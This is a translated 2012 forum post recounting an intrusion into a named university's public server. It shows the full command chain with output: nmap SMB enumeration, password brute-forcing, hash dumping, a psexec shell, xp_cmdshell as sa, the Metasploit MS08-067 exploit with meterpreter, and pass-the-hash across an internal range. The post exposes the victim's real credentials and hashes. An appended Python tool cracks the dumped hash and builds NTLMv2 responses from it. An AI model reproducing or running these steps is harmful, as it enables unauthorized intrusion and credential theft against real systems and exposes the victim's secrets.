nmap + msf intrusion into Guangxi Normal University

Original poster, posted on 2012-12-4 12:46:42
Guangxi Normal University site: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// guess the account passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use the MS08-067 vulnerability in msf to exploit the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]    (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the user names and the captured hash to try logging in across the whole internal range

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful. A simple msf + nmap attack~~
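Added example, not code from the original post or from the nmap/Metasploit projects: a small pure-Python tool that works on the smb-pwdump output shown in the post and explains why the last step can reuse a dumped hash instead of a password. It reimplements MD4 (hashlib's md4 is often disabled under OpenSSL 3), computes NT hashes, parses the `user:rid => LM:NT` lines, flags the accounts pwdump prints as NO PASSWORD (the empty-password hashes), flags accounts that still store an LM hash (password at most 14 characters; a second half of AAD3B435B51404EE means at most 7), checks the NT hashes against a tiny wordlist, and computes an NTLMv2 response (MS-NLMP 3.3.2) from the hash alone, which is the pass-the-hash property. The sample dump is copied from the post; the wordlist, the server challenge and blob bytes, and the use of PG-F289F9A8EF3E as the domain are assumptions made for the example.

```python
# Added example, not code from the original post: offline triage of a smb-pwdump
# dump and a demonstration that the NT hash alone authenticates (pass-the-hash).
import hmac
import struct
from hashlib import md5

MASK = 0xFFFFFFFF
BLANK_LM_HALF = "AAD3B435B51404EE"             # LM hash of an empty 7-char half
BLANK_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"  # MD4("") = NT hash of the empty password


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; reimplemented because hashlib's md4 is often disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # message length in bits, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):                           # round 1: F, words in order
            a = _rol((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 2: G, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = _rol((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 3: H, words 0,8,4,12,2,10,...
            k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]
            a = _rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE password): unsalted, so dumps are directly comparable."""
    return md4(password.encode("utf-16le")).hex().upper()


def parse_pwdump(lines):
    """Parse the 'user:rid => LM:NT' lines that smb-pwdump prints."""
    accounts = []
    for line in lines:
        line = line.strip().lstrip("|_ ")
        if "=>" not in line:
            continue
        left, right = (p.strip() for p in line.split("=>", 1))
        user, rid = left.split(":")
        lm, nt = right.split(":")
        # pwdump prints "NO PASSWORD***" in place of the well-known empty-password hashes
        lm = BLANK_LM_HALF * 2 if lm.startswith("NO PASSWORD") else lm.upper()
        nt = BLANK_NT if nt.startswith("NO PASSWORD") else nt.upper()
        accounts.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return accounts


def triage(accounts, wordlist):
    """Map each user to its findings: blank password, LM exposure, wordlist hit."""
    findings = {}
    for acct in accounts:
        if acct["nt"] == BLANK_NT:
            findings[acct["user"]] = ["blank password"]
            continue
        notes = []
        if acct["lm"] != BLANK_LM_HALF * 2:               # LM present => password <= 14 chars
            notes.append("LM hash stored (password <= 14 chars)")
            if acct["lm"].endswith(BLANK_LM_HALF):        # second half empty => <= 7 chars
                notes.append("password <= 7 chars")
        hit = next((w for w in wordlist if nt_hash(w) == acct["nt"]), None)
        if hit is not None:
            notes.append("cracked: " + hit)
        findings[acct["user"]] = notes
    return findings


def ntlmv2_response(nt_hash_hex, user, domain, server_challenge, blob):
    """MS-NLMP 3.3.2: keyed by the NT hash, never by the password, hence pass-the-hash."""
    key = hmac.new(bytes.fromhex(nt_hash_hex), (user.upper() + domain).encode("utf-16le"), md5).digest()
    proof = hmac.new(key, server_challenge + blob, md5).digest()
    return proof + blob


# Constructed sample input: the smb-pwdump block from the post above, verbatim.
SAMPLE_DUMP = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2""".splitlines()

if __name__ == "__main__":
    for user, notes in triage(parse_pwdump(SAMPLE_DUMP), ["password", "123456"]).items():
        print(f"{user:15s} {', '.join(notes) or 'no finding'}")
    chal, blob = bytes(range(8)), b"\x01\x01" + bytes(30)   # assumed demo challenge/blob; domain below is the post's workgroup
    print(ntlmv2_response("32ED87BDB5FDC5E9CBA88547376818D4", "test", "PG-F289F9A8EF3E", chal, blob).hex())
```

Run it as is and the dump above triages itself: Administrator and Guest come out as blank passwords (matching the smb-brute result), test is flagged as LM-stored, at most 7 characters and cracked as 123456, and TsInternetUser keeps only the LM exposure finding. The NTLMv2 response built from the dumped hash is byte-for-byte the one a client holding the password 123456 would send, which is the whole reason the hash in password.txt can be replayed against 192.168.1.1-254 without cracking it; the defensive reading is that storing LM hashes and leaving blank-password accounts on a host with an anonymously readable IPC$ share is what made every later step free.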